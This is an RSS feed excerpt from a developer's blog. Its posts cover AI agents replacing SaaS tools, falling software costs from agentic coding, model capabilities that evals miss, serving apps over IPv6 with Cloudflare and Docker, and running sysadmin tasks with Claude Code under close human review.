<li id="fn1" class="footnote-item"><p>Obviously, don't ship production API keys in your client side bundle. But a lot of people will ship their entire A/B testing framework, with every inactive and active test detailed. This is probably quite commercially sensitive and will give your entire roadmap away if you are not careful. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/minification-isnt-obfuscation-claude-code-proves-it/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/minification-isnt-obfuscation-claude-code-proves-it/</guid>
      <pubDate>Thu, 18 Dec 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>AI agents are starting to eat SaaS</title>
      <description>Software ate the world. Agents are going to eat SaaS.</description>
      <content:encoded><![CDATA[<p>We spent fifteen years watching <a href="https://a16z.com/why-software-is-eating-the-world/">software eat the world</a>. Entire industries got swallowed by software - retail, media, finance - you name it, there has been incredible disruption over the past couple of decades with a proliferation of SaaS tooling. This has led to a huge swath of SaaS companies - valued, collectively, in the trillions.</p>
<p>In my last post debating if the cost of <a href="https://martinalderson.com/posts/has-the-cost-of-software-just-dropped-90-percent/">software has dropped 90%</a> with AI coding agents I mainly looked at the <em>supply</em> side of the market. What will happen to <em>demand</em> for SaaS tooling if this hypothesis plays out? I've been thinking a lot about these second and third order effects of the changes in software engineering.</p>
<p>The calculus on build vs buy is starting to change. Software ate the world. Agents are going to eat SaaS.</p>
<h2>The signals I'm seeing</h2>
<p>The obvious place to start is simply demand starting to evaporate - especially for &quot;simpler&quot; SaaS tools. I'm sure many software engineers have started to realise this - many things I'd think to find a freemium or paid service for I can get an agent to often solve in a few minutes, exactly the way I want it. The interesting thing is I didn't even notice the shift. It just happened.</p>
<p>If I want an internal dashboard, I don't even think that Retool or similar would make it easier. I just build the dashboard. If I need to re-encode videos as part of a media ingest process, I just get Claude Code to write a robust wrapper round ffmpeg - and not incur all the cost (and speed) of sending the raw files to a separate service, hitting tier limits or trying to fit another API's mental model in my head.</p>
<p>This is even more pronounced for less pure software development tasks. For example, I've had Gemini 3 produce really high quality UI/UX mockups and wireframes in minutes - not needing to use a separate service or find some templates to start with. Equally, when I want to do a presentation, I don't need to use a platform to make my slides look nice - I just get Claude Code to export my markdown into a nicely designed PDF.</p>
<p>The other, potentially more impactful, shift I'm starting to see is people really questioning renewal quotes from larger &quot;enterprise&quot; SaaS companies. While this is very early, I believe this is a really important emerging behaviour. I've seen a few examples now where SaaS vendor X sends through their usual annual double-digit % increase in price, and now teams are starting to ask &quot;do we actually need to pay this, or could we just build what we need ourselves?&quot;. A year ago that would be a hypothetical question at best with a quick 'no' conclusion. Now it's a real option people are putting real effort into thinking through.</p>
<p>Finally, most SaaS products contain many features that many customers don't need or use. A lot of the complexity in SaaS product engineering is managing that - which evaporates overnight when you have only one customer (your organisation). And equally, this customer has complete control of the roadmap when it is the same person. No more hoping that the SaaS vendor prioritises your requests over other customers.</p>
<h2>The maintenance objection</h2>
<p>The key objection to this is &quot;who maintains these apps?&quot;. Which is a genuine, correct objection to have. Software has bugs to fix, scale problems to solve, security issues to patch and that isn't changing.</p>
<p>I think firstly it's important to point out that a <em>lot</em> of SaaS is poorly maintained (and in my experience, often the more expensive it is, the poorer the quality). Often, the security risk comes from having an external third party <em>itself</em> needing to connect and interface with internal data. If you can just move this all behind your existing VPN or access solution, you suddenly reduce your organisation's attack surface dramatically.</p>
<p>On top of this, agents <em>themselves</em> lower maintenance cost dramatically. Some of the most painful maintenance tasks I've had - updating from deprecated libraries to another one with more support - are made significantly easier with agents, especially in statically typed programming ecosystems. Additionally, the biggest hesitancy with companies building internal tools is having one person know everything about it - and if they leave, all the internal knowledge goes. Agents don't leave. And with a well thought through AGENTS.md file, they can explain the codebase to anyone in the future.</p>
<p>Finally, SaaS comes with maintenance problems too. A recent flashpoint I've seen this month from a friend is a SaaS company deciding to deprecate their existing API endpoints and move to another set of APIs, which don't have all the same methods available. As this is an essential system, this is a huge issue and requires an enormous amount of resource to update, test and rollout the affected integrations.</p>
<p>I'm not suggesting that SMEs with no real software knowledge are going to suddenly replace their entire SaaS suite. What I do think is starting to happen is that organisations with some level of tech capability and understanding are going to think even more critically at their SaaS procurement and vendor lifecycle.</p>
<h2>The economics problem for SaaS</h2>
<p>SaaS valuations are built on two key assumptions: fast customer growth and high NRR (often exceeding 100%).</p>
<p>I think we can start to see a world already where demand from new customers for certain segments of tooling and apps begins to decline. That's a problem, and will cause an increase in the sales and marketing expenditure of these companies.</p>
<p>However, the more insidious one is net revenue retention (NRR) declines. NRR is a measure of how much existing customers spend with you on an ongoing basis, adjusted for churn. If your NRR is at 100%, your existing cohort of customers are spending the same. If it's less than that then they are spending less with you <em>and/or</em> customers are leaving overall.</p>
<p>Many great SaaS companies have NRR significantly above 100%. This is the beauty of a lot of SaaS business models - companies grow and require more users added to their plan. Or they need to upgrade from a lower priced tier to a higher one to gain additional features. These increases are generally <em>very</em> profitable. You don't need to spend a fortune on sales and marketing to get this uptick (you already have a relationship with them) and the profit margin of adding another 100 user licenses to a SaaS product for a customer is somewhere close to infinity.</p>
<p>This is where I think some SaaS companies will get badly hit. People will start migrating parts of the solution away to self-built/modified internal platforms to avoid having to pay significantly more for the next pricing tier up. Or they'll ingest the data from your platform via your APIs and build internal dashboards and reporting which means they can remove 80% of their user licenses.</p>
<h2>Where this doesn't work (and what still has a moat)</h2>
<p>The obvious one is anything that requires very high uptime and SLAs. Getting to four or five 9s is really hard, and building high availability systems gets really difficult - and it's very easy to shoot yourself in the foot building them. As such, things like payment processing and other core infrastructure are pretty safe in my eyes. You're not (yet) going to replace Stripe and all their engineering work on core payments easily with an agent.</p>
<p>Equally, very high volume systems and data lakes are difficult to replace. It's not trivial to spin up clusters for huge datasets or transaction volumes. This again requires specialised knowledge that is likely to be in short supply at your organisation, if it exists at all.</p>
<p>The other one is software with significant network effects - where you collaborate with people, especially external to your organisation. Slack is a great example - it's not something you are going to replace with an in-house tool. Equally, products with rich integration ecosystems and plugin marketplaces have a real advantage here.</p>
<p>And companies that have proprietary datasets are still very valuable. Financial data, sales intelligence and the like stay valuable. If anything, I think these companies have a real edge as agents can leverage this data in new ways - they get more locked in.</p>
<p>And finally, regulation and compliance is still very important. Many industries require regulatory compliance - this isn't going to change overnight.</p>
<p>This does require your organisation having the skills (internally or externally) to manage these newly created apps. I think products and people involved in SRE and DevOps are going to have a real upswing in demand. I suspect we'll see entirely new functions and teams in companies solely dedicated to managing these new applications. This does of course have a cost, but this cost can be often managed by existing SRE or DevOps functions, or if it requires new headcount and infrastructure, amortised over a much higher number of apps.</p>
<h2>Who's most at risk?</h2>
<p>To me the companies that are at serious risk are back-office tools that are really just CRUD logic - or simple dashboards and analytics on top of their customers' <em>own data</em>.</p>
<p>These tools often generate a lot of friction - because they don't work <em>exactly</em> the way the customer wants them to - and they are tools that are the most easily replaced with agents. It's very easy to document the existing system and tell the agent to build something, but with the pain points removed.</p>
<p>SaaS certainly isn't dead. Like any major shifts in technology, there are winners and losers. I do think the bar is going to be much higher for many SaaS products that don't have a clear moat or proprietary knowledge.</p>
<p>What's going to be difficult to predict is how quickly agents can move up the value chain. I'm assuming that agents can't manage complex database clusters - but I'm not sure that's going to be the case for much longer.</p>
<p>And I'm not seeing a path for every company to suddenly replace all their SaaS spend. If anything, I think we'll see (another) splintering in the market. Companies with strong internal technical ability vs those that don't. This becomes yet another competitive advantage for those that do - and those that don't will likely see dramatically increased costs as SaaS providers try and recoup some of the lost sales from the first group to the second who are less able to switch away.</p>
<p>But my key takeaway would be that if your product is just a SQL wrapper on a billing system, you now have thousands of competitors: engineers at your customers with a spare Friday afternoon with an agent.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/ai-agents-are-starting-to-eat-saas/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/ai-agents-are-starting-to-eat-saas/</guid>
      <pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Has the cost of building software just dropped 90%?</title>
      <description>Agentic coding tools are dramatically reducing software development costs. Here&#39;s why 2026 is going to catch a lot of people off guard.</description>
      <content:encoded><![CDATA[<p>I've been building software professionally for nearly 20 years. I've been through a lot of changes - the 'birth' of SaaS, the mass shift towards mobile apps, the outrageous hype around blockchain, and the perennial promise that low-code would make developers obsolete.</p>
<p>The economics have changed <em>dramatically</em> now with agentic coding, and it is going to totally transform the software development industry (and the wider economy). 2026 is going to catch a lot of people off guard.</p>
<p>In my previous post I delved into why I think <a href="https://martinalderson.com/posts/are-we-in-a-gpt4-style-leap-that-evals-cant-see/">evals are missing</a> some of the big leaps, but thinking this over since then (and recent experience) has made me confident we're in the early stages of a once-in-a-generation shift.</p>
<h2>The cost of shipping</h2>
<p>I started developing just around the time open source started to really explode - but it was clear this was one of the first big shifts in cost of building custom software. I can remember eye watering costs for SQL Server or Oracle - and as such started out really with MySQL, which did allow you to build custom networked applications without incurring five or six figures of annual database licensing costs.</p>
<p>Since then we've had cloud (which I would debate is a cost saving at all, but let's be generous and assume it has some initial capex savings) and lately what I feel has been the era of complexity. Software engineering has got - in my opinion, often needlessly - complicated, with people rushing to very labour intensive patterns such as TDD, microservices, super complex React frontends and Kubernetes. I definitely don't think we've seen much of a cost decrease in the past few years.</p>
<p><img src="https://martinalderson.com/img/cost_of_shipping@2x.png" alt="Cost of shipping software over time"></p>
<p>AI Agents however in my mind <em>massively</em> reduce the labour cost of developing software.</p>
<h2>So where do the 90% savings actually come from?</h2>
<p>At the start of 2025 I was incredibly sceptical of a lot of the AI coding tools - and a lot of them I still am. Many of the platforms felt like glorified low code tooling (Loveable, Bolt, etc), or VS Code forks with some semi-useful (but often annoying) autocomplete improvements.</p>
<p>Take an average project for an internal tool in a company. Let's assume the data modelling is already done to some degree, and you need to implement a web app to manage widgets.</p>
<p>Previously, you'd have a small team of people working on setting up CI/CD, building out data access patterns and building out the core services. Then usually a whole load of CRUD-style pages and maybe some dashboards and graphs for the user to make. Finally you'd (hopefully) add some automated unit/integration/e2e tests to make sure it was fairly solid and ship it, maybe a month later.</p>
<p>And that's just the direct labour. Every person on the project adds coordination overhead. Standups, ticket management, code reviews, handoffs between frontend and backend, waiting for someone to unblock you. The actual coding is often a fraction of where the time goes.</p>
<p><em>Nearly all of this</em> can be done in a few hours with an agentic coding CLI. I've had Claude Code write an entire unit/integration test suite in a few hours (300+ tests) for a fairly complex internal tool. This would take me, or many developers I know and respect, days to write by hand.</p>
<p>The agentic coding tools have got <em>extremely</em> good at converting business logic specifications into pretty well written APIs and services.</p>
<p>A project that would have taken a month now takes a week. The thinking time is roughly the same  - the implementation time collapsed. And with smaller teams, you get the inverse of Brooks's Law: instead of communication overhead scaling with headcount, it disappears. A handful of people can suddenly achieve an order of magnitude more.</p>
<h2>Latent demand</h2>
<p>On the face of it, this seems like incredibly bad news for the software development industry - but economics tells us otherwise.</p>
<p><a href="https://en.wikipedia.org/wiki/Jevons_paradox">Jevons Paradox</a> says that when something becomes cheaper to produce, we don't just do the same amount for less money. Take electric lighting for example; while sales of candles and gas lamps fell, overall <em>far</em> more artificial light was generated.</p>
<p>If we apply this to software engineering, think of supply and demand. There is <em>so much</em> latent demand for software. I'm sure every organisation has hundreds if not thousands of Excel sheets tracking important business processes that would be far better off as a SaaS app. Let's say they get a quote from an agency to build one into an app for $50k - only essential ones meet the grade. At $5k (for a decent developer + AI tooling) - suddenly there is far more demand.</p>
<p><img src="https://martinalderson.com/img/latent_demand@2x.png" alt="Latent demand for software"></p>
<h2>Domain knowledge is the only moat</h2>
<p>So where does that leave us? Right now there is still enormous value in having a human 'babysit' the agent - checking its work, suggesting the approach and shortcutting bad approaches. Pure YOLO vibe coding ends up in a total mess very quickly, but with a human in the loop I think you can build incredibly good quality software, <em>very</em> quickly.</p>
<p>This then allows developers who really master this technology to be hugely effective at solving business problems. Their domain and industry knowledge becomes a huge lever - knowing the best architectural decisions for a project, knowing which framework to use and which libraries work best.</p>
<p>Layer on understanding of the business domain and it does genuinely feel like the mythical 10x engineer is here. Equally, the pairing of a business domain expert with a motivated developer and these tools becomes an incredibly powerful combination, and something I think we'll see becoming quite common - instead of a 'squad' of a business specialist and a set of developers, we'll see a far tighter pairing of a couple of people.</p>
<p>This combination allows you to iterate incredibly quickly, and software becomes almost disposable - if the direction is bad, then throw it away and start again, using those learnings. This takes a fairly large mindset shift, but the hard work is the <em>conceptual thinking</em>, not the typing.</p>
<h2>Don't get caught off guard</h2>
<p>The agents and models are still improving rapidly, which I don't think is really being captured in the benchmarks. Opus 4.5 seems to be able to follow long 10-20 minute sessions without going completely off piste. We're just starting to see the results of the hundreds of billions of dollars of capex that has gone into GB200 GPUs now, and I'm sure newer models will quickly make these look completely obsolete.</p>
<p>However, I've spoken to so many software engineers that are really fighting this change. I've heard the same objections too many times - LLMs make too many mistakes, it can't understand <code>[framework]</code>, or it doesn't really save any time.</p>
<p>These assertions are rapidly becoming completely false, and remind me a lot of the desktop engineers who dismissed the iPhone in 2007. I think we all know how that turned out - networking got better, the phones got way faster and the mobile operating systems became very capable.</p>
<p>Engineers need to really lean in to the change in my opinion. This won't change overnight - large corporates are still very much behind the curve in general, lost in a web of bureaucracy of vendor approvals and management structures that leave them incredibly vulnerable to smaller competitors.</p>
<p>But if you're working for a smaller company or team and have the power to use these tools, you should. Your job is going to change - but software has always changed. Just perhaps this time it's going to change faster than anyone anticipates. 2026 is coming.</p>
<p>One objection I hear a lot is that LLMs are only good at greenfield projects. I'd push back hard on this. I've spent plenty of time trying to understand 3-year-old+ codebases where everyone who wrote it has left. Agents make this dramatically easier - explaining what the code does, finding the bug(s), suggesting the fix. I'd rather inherit a repo written with an agent and a good engineer in the loop than one written by a questionable quality contractor who left three years ago, with no tests, and a spaghetti mess of classes and methods.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/has-the-cost-of-software-just-dropped-90-percent/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/has-the-cost-of-software-just-dropped-90-percent/</guid>
      <pubDate>Mon, 08 Dec 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Are we in a GPT-4-style leap that evals can&#39;t see?</title>
      <description>Gemini 3 Pro&#39;s design capabilities and Opus 4.5&#39;s reduced babysitting needs represent a subtle but significant leap that traditional benchmarks completely miss.</description>
      <content:encoded><![CDATA[<p>I feel like we've just had another GPT4 moment (after everyone being sure that scaling laws were collapsing and progress was stalled). It's more subtle than GPT4, but I think it has huge implications for many industries and potentially the economy as a whole.</p>
<h2>Chat is a terrible eval</h2>
<p>I've come to the conclusion that we've (mostly) maxxed out ad hoc chat as a way to evaluate models. I think everyone got very used to this being the defacto way to test LLMs - GPT4 was clearly <em>so much better</em> at answering (any) question than 3.5 that it was so obviously a big step forward.</p>
<p>Lately that definitely hasn't been happening, and I think most people have got to a point (especially with the hype) that each model release is a bit of a disappointment.</p>
<p>Over the last year or so I've found that I highly prefer speed of response to &quot;quality&quot; for day to day &quot;ad hoc&quot; usage of LLMs for answering questions in their respective UIs. I probably came to this conclusion when Gemini 2.5 Pro Preview came out (which feels like a lifetime ago, but is less than a year ago!). While it was a very impressive model, the thinking step was so slow for chatting to it that I switched back to Sonnet 3.5, which probably wasn't as good, but was vastly faster.</p>
<p>As such I've sort of resigned myself to the fact that my usual way of ranking models by asking them various niche questions in my industry is not a good way to get a feel for them. Speed also hugely matters to how good I think a model is, and how much I'll use it. Tl;dr, I am terrible at evaluating the quality of models based on chatting with them.</p>
<h2>Gemini 3 Pro Preview is incredible at design</h2>
<p>Gemini 3 has probably been the model I've been most excited about for a while. I think many people who follow LLM developments closely probably felt the same.</p>
<p>When it was released I started playing around with it, and while it seemed to be good I was again hitting the point where it's very difficult for me to really tell the difference between models.</p>
<p>However... there is one thing it is incredible at doing which I just haven't seen another model do. It's genuinely good at designing things. If you ask it to design a website or a landing page, the results that come back (mostly) look great.</p>
<p>This really does change things. I've been using it <em>so much</em> to build prototypes that look somewhere between passable and genuinely impressive. It genuinely feels like having a fairly good designer sitting next to you, that can come back with iterations in a couple of minutes.</p>
<h2>But I can build prototypes with any model?!</h2>
<p>Yes you can, but they all end up having what I call &quot;bootstrap emoji chic&quot;, where everything looks pretty plain and absolutely inundated with emojis.</p>
<p>The issue with this when I've been building prototypes is that they tend to all look the same regardless of the project you're working on. With a bit more visual fidelity I find it much easier to get excited about a concept or idea (or not).</p>
<p>It's also far better at adhering to screenshots to give a flavour of what the existing UI/branding looks like - a very quick screenshot and a prompt will get you very far in terms of a prototype that matches branding. And if you can give it a design system (or ask it to extract one from a &quot;real&quot; CSS file) you can get stuff that is very much on brand, to my non-professional-designer eyes.</p>
<p>It's really best to try this yourself, with your own organisations branding and product. My (poor) attempts to illustrate this for this article don't really capture the &quot;magic&quot;. This is my suggested approach to doing this is the following:</p>
<ol>
<li>Grab your CSS file(s) for your product. Minified is fine - upload it to a new Gemini chat system and ask it to pull out a design system and an HTML example of it with the canvas tool enabled. Ask it to focus on typography, colours, elements, etc.</li>
<li>Open a new chat, paste in the code output from the canvas tool in the above step with a screenshot of your product (or two). Ask it to make a HTML prototype of whatever new feature you think would be cool. I strongly suspect you'll be blown away with the results visually.</li>
</ol>
<p>You can then start creating landing pages for your new feature, and even play around with ad creative for it. It feels like you can really go a lot further on prototyping an idea from concept to actual &quot;go to market&quot; which for me at least is really exciting - often we get totally stuck in the code part.</p>
<p>I don't think any of the standard evals for LLMs test this kind of 'design taste', but it's a huge part of software/product development and it feels like Gemini 3 Pro finally crossed a line in terms of quality.</p>
<h2>Opus 4.5?</h2>
<p>Of course Anthropic then released Opus 4.5 a few days after - the pace is relentless.</p>
<p>However, the real magic of Opus 4.5 isn't for design, it's for software engineering itself (of course). I still think Claude Code is far ahead of the competition here - Codex and Gemini CLI regardless of model still just don't click for me the same way Claude Code does, and I was a bit confused at the launch of Google Antigravity, which is the 3rd (or 4th?) coding &quot;agent&quot; attempt from Google.</p>
<p>At first I noticed absolutely no difference between Sonnet 4.5 and Opus 4.5. But it does actually seem genuinely far better at not going horribly off piste. I can seemingly go for an hour or more without me having to stop and correct it going horribly wrong. It's not perfect, but when I'm interacting with it I tend to be doing minor adjustments rather than asking why on earth it's decided to install a completely new web framework out of the blue.</p>
<p>Again, this is hard to explain until you've used it for a while and you start realising that you are not constantly interrupting it. I've had it run some complex tasks (running analysis and building dashboards on a huge, complex, Clickhouse dataset, for example) over the past week which I'd have to babysit Sonnet 4.5, whereas Opus 4.5 has just done it. I've expected to see loads of mistakes when I've reviewed it, but it just works 95% of the time.</p>
<p>Between these two facts - &quot;midlevel designer&quot; ability, and being able to go what feels like 5x as long with an agent before things falling apart badly - it actually feels like LLMs are now capable of an order of magnitude more of a product development lifecycle.</p>
<p>Before it felt like we had some pretty good (if forgetful) software engineers we were managing as agents. It now starts to feel like you're managing a whole cross functional squad, with Gemini doing UX/UI/graphic design, and Opus 4.5 feeling like a far less annoying software engineer.</p>
<h2>Are we just benchmarking everything wrong?</h2>
<p>I think the really interesting conclusion to this is that both the things I've been so impressed with are <em>not</em> obvious knowledge retrieval, which is mentally how the industry seems to be sizing up LLMs.</p>
<p>The Gemini 3 design breakthrough is really a matter of taste, and I don't know of any benchmarks that test for this. It feels definitely possible - a great one would be to have a panel of designers rank screenshots of product outputs for a prompt - but instead we get endless math, science and SWE benchmarks that don't really cover this.</p>
<p>The second part - requiring less babysitting - I also expect most (all?) benchmarks don't test for. As far as I'm aware, benchmarks (by their nature) run a totally isolated environment with examples passing or failing. This doesn't actually really capture how at least I use coding agents. I don't just put it in yolo mode and have a very simple pass/fail for the task.</p>
<p>Instead it's a much more iterative process - making a plan, watching its output, interrupting it when I can see something that's not right.</p>
<p>I really hope the industry starts adding more benchmarks like this. We're evaluating them like STEM students at a university exam. The world doesn't work like that - we need a bit more qualitative 'taste' style benchmarking too for other roles.</p>
<p>This has been a <em>subtle</em> GPT-4 moment for me. I feel like I've got a whole new dimension of things I can build to an acceptable standard (design), and far more headspace to do it without constantly interrupting Claude.</p>
<p>And this is where I think we start seeing the broader economic impacts of this. There's been a big disconnect between benchmark scores and hypothetical GDP growth when it comes to LLMs which has had a lot of people puzzled and has given a lot of ammunition to AI being a giant hype bubble. I (highly) suspect that the link is there, but we've just been doing the wrong benchmarks.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/are-we-in-a-gpt4-style-leap-that-evals-cant-see/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/are-we-in-a-gpt4-style-leap-that-evals-cant-see/</guid>
      <pubDate>Sun, 30 Nov 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>I Finally Found a Use for IPv6</title>
      <description>Using IPv6 with Cloudflare to run multiple services on a single server without a reverse proxy</description>
      <content:encoded><![CDATA[<p>IPv6 has been a bit of a conundrum to me. While we've clearly ran out of IPv4 addresses, the penetration of IPv6 on client networks has been incredibly slow, making it unfeasible apart from niche use cases to serve pure IPv6-only. And like it or loathe it CG-NAT has really taken quite a lot of urgency out of the migration - residential ISPs are using it en masse to put tens of thousands of customers behind one IPv4 address.</p>
<p>I haven't came across many places that treat IPv6 as a first class citizen in their web app infrastructure - if anything many places have it entirely firewalled as it's been a pain to configure and support.</p>
<p>However, I have <em>finally</em> found an interesting use for it, which I thought I'd share.</p>
<h2>The Problem: Running many apps on one server</h2>
<p>I've been a huge fan of running bare metal servers for workloads. For very little money you can get a seriously powerful machine that can run dozens of applications at once, serving a surprisingly large amount of traffic. Equally some of the cheaper VPS offerings now come with many CPU cores and 16GB+ of memory - more than enough to run 10+ simpler webapps.</p>
<p>This all works great until you need to access it from the internet and realise you might have (if you are lucky) 5 routable IP addresses - perhaps even only one.</p>
<p>At this point you have a few options. The classic way is to put a reverse proxy on the server, and start doing virtual host routing to various ports internally. While this works, I've never been a huge fan of it - the config gets a bit messy especially with TLS termination and it also means if your reverse proxy fails for whatever reason, all of your apps behind it go down. There are some good options with Docker sidecars, but it doesn't really resolve the single point of failure.</p>
<p>Or you could just get more IPv4 addresses, but they get expensive quickly and are sometimes hard to justify.</p>
<h2>Using Cloudflare with IPv6</h2>
<blockquote>
<p>I'm aware that Cloudflare now becomes a huge single point of failure for this. However, most of these services I proxy through Cloudflare anyway, so it still reduces the risk of having a second level reverse proxy on the machine itself.</p>
</blockquote>
<p>While diagnosing a weird LetsEncrypt failure, I realised I did have an entire IPv6 /64 (18.4 quintillion addresses!) routed to the server and it gave me a thought. Could Cloudflare just communicate with the server via IPv6 and have each service listen on an IPv6 address, and expose it to the world via IPv4?</p>
<p>The answer unsurprisingly is yes. All you need to do is add an AAAA (IPv6 version of an A) record to the DNS and it all just works. Cloudflare will handle the translation for users that don't support IPv6. Just make sure port 443 is open on IPv6 in ufw or iptables so traffic isn't firewalled in.</p>
<p><img src="https://martinalderson.com/img/ipv6-cloudflare-dns.png" alt="Cloudflare DNS AAAA record configuration"></p>
<p>You can use the <code>::</code> syntax in IPv6 to mean &quot;fill in with 0s&quot;. This makes it easy to do <code>2a01:4f9:c012:8cf2::1</code>, <code>2a01:4f9:c012:8cf2::2</code>, etc. The great thing about IPv6 is all of the subnet is routed automatically to you - you don't have to add each IPv6 address manually you want to use.</p>
<h2>Ephemeral environments</h2>
<p>You can take this one step further if you want by using the Cloudflare API as part of your CI/CD process if you are deploying ephemeral environments. Simply choose a random IPv6 address in your /64 (the chance of collision is incredibly low), tell your service to listen on that, and route it with the Cloudflare API.</p>
<h2>Drawbacks (guess?)</h2>
<p>The (major) drawback of all this is Docker's mediocre (at best) support for IPv6. If it's just for side projects that you're not too worried about security wise, you can just run:</p>
<pre><code class="language-bash">docker run -d --network host yetanothersideproject --bind 2a01:4f9:c012:8cf2::2
</code></pre>
<p>and it will all work very smoothly. The downside of this is you don't have network isolation in Docker anymore, so be aware that you are losing quite a lot of the security isolation Docker provides.</p>
<p>The other option I've found is <code>macvlan</code>:</p>
<p>You need to create this network first (once only - not per Docker container). This effectively gives each Docker container a virtual NIC with its own MAC address.</p>
<pre><code class="language-bash">docker network create -d macvlan --subnet=2a01:4f9:c012:8cf2::/64 --ipv6 -o parent=eth0 mynet
</code></pre>
<p>then run (and cross your fingers):</p>
<pre><code class="language-bash">docker run -d --network mynet --ip6 2a01:4f9:c012:8cf2::2 yetanothersideproject
</code></pre>
<p>The problem here though is while it has proper isolation, the container itself won't have IPv4 support for <em>outgoing</em> connections. You may get away with this depending on what your server needs to access on the external internet, but I wouldn't recommend it if you want to retain your sanity.</p>
<p>You can get round this by using NAT and giving it an IPv4 address as well:</p>
<pre><code class="language-bash">iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
</code></pre>
<pre><code class="language-bash">docker network create -d macvlan \
  --subnet=192.168.1.0/24 \
  --gateway=192.168.1.1 \
  --subnet=2a01:4f9:c012:8cf2::/64 \
  --ipv6 \
  -o parent=eth0 \
  mynet
</code></pre>
<p>It does look like things are slowly getting better, with this <a href="https://github.com/moby/moby/pull/48271">IPv6 only API option</a> being another stepping stone towards it. Docker 28.0 added <code>EnableIPv4</code> as a network option, meaning you can create true IPv6-only networks (behind the <code>--experimental</code> flag for now).</p>
<p>Unfortunately I found Docker by far the biggest issue. I really hope they have an easier way to support this workflow. I do want to look at Podman in the future, which apparently has much better support for IPv6. Let me know if you have any thoughts on this!</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/i-finally-found-a-use-for-ipv6/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/i-finally-found-a-use-for-ipv6/</guid>
      <pubDate>Tue, 25 Nov 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>How I use Claude Code to manage sysadmin tasks</title>
      <description>A practical approach to managing production infrastructure using git-tracked markdown files and Claude Code for small teams</description>
      <content:encoded><![CDATA[<p>If like me you're heavily bought into the benefits of <a href="https://martinalderson.com/posts/how-i-make-cicd-much-faster-and-cheaper/">blazing fast, affordable, bare metal servers</a> I've found Claude Code makes a superb assistant for helping managing the maintenance of them. This pattern does, however, work just as well for cloud-first deployments (see the section towards the end).</p>
<blockquote>
<p>I've built this pattern organically over the past few months, and I've found it has worked great for small teams. This is obviously not designed for larger teams with a SRE function and compliance requirements.</p>
</blockquote>
<h2>Infrastructure as markdown</h2>
<p>The key to getting this working well, in my experience, is organising the 'tasksets' you might want to do in individual folders with CLAUDE.md files. I commit each of these separately to Git to version them and share them with others. If you're working on a new type of process or task, you can easily branch off main and PR them back.</p>
<p>The folder structure I came up with looks something like this:</p>
<pre><code>agentic-sysadmin/
├── projectname-app-maintenance/ (git repo)
│   └── CLAUDE.md
└── projectname-dba/ (git repo)
    ├── CLAUDE.md
    └── benchmark-queries.md
</code></pre>
<p>For each project I'm working on I set up a folder for groups of tasks and git repo. In this simplistic example I've got two different git repos - one for general maintenance tasks, and one for DBA style tasks.</p>
<p>The core of it is a CLAUDE.md file, but I also include helpful outputs - for example, for the DBA repo I include a set of common queries the application does so if we're working on improving query performance it can just grab them. The CLAUDE.md has hints to the other files and an explanation of what to use them for. This &quot;progressive disclosure&quot; pattern means you can be context efficient.</p>
<p>I'll come to more concrete examples of tasks and what's in the CLAUDE.md, but at a minimum I include:</p>
<ul>
<li>General Information about the server(s) - how to connect, hardware specs, OS info, inventory of packages/docker containers installed</li>
<li>General context about what the project does</li>
<li>Hint of where the source code for the project lives on your filesystem</li>
<li>Common tasks and playbooks, known issues/workarounds</li>
</ul>
<p>You can of course get Claude Code to start building this out for you - once you have secure access setup, you can carefully get it to start doing an inventory of the server for you.</p>
<h2>SSH Keys and Security Setup</h2>
<p>To improve security, it's important to setup SSH key access to your server and then tunnel all commands over that - basic security applies. This also avoids this folder having any credentials in it whatsoever. It's just documentation.</p>
<p>I've also setup <code>~/.ssh/config</code> with aliases so it doesn't even need to know IP addresses and usernames. You just put something similar to this in your config file, and then reference the server &quot;Use ssh appserver1-lon-uk to connect&quot; in your CLAUDE.md file:</p>
<pre><code>Host appserver1-lon-uk
        HostName 10.10.10.10
        User appuser
        ProxyJump bastion-host
</code></pre>
<p>For additional security you can use a bastion and use the ProxyJump command to proxy all commands through that. This works great in my experience and Claude doesn't even need to know about it!</p>
<p>I can't emphasise this enough - you want <em>zero</em> sensitive information in these repos. Don't overlook security setup you'd do normally.</p>
<h2>A concrete example</h2>
<p>I've been working a lot with Clickhouse recently. As we were building the infrastructure out I wanted to setup a solid backup system. I started by doing the normal research I'd normally do, and it seemed like <code>clickhouse-backup</code> was the best supported approach to do this.</p>
<p>I first start with the plan command in Claude Code to come up with a detailed plan, pasting in all the documentation on clickhouse-backup . I then did plenty of research on each part of the plan - the idea is to do the absolute opposite of 'vibe coding' here. Meticulously research each step it is suggesting, push back on what isn't clear and make sure you don't leave anything to chance.</p>
<p>It should feel like you are &quot;pairing&quot; with the agent - asking it to check before doing anything, getting it to come up with verification steps <em>before</em> running anything and being willing to take over to do certain things yourself if you feel happier with that psychologically. You want to be reading every ssh command it issues like you wrote it yourself.</p>
<p>In about an hour I'd managed to get <code>clickhouse-backup</code> (something I'd not used before) setup with encryption, backing up to s3 compatible storage and done a test recovery locally with verification against the real database. I also set up a dead man's switch if a backup doesn't occur to alert me (with a webhook to https://healthchecks.io/).</p>
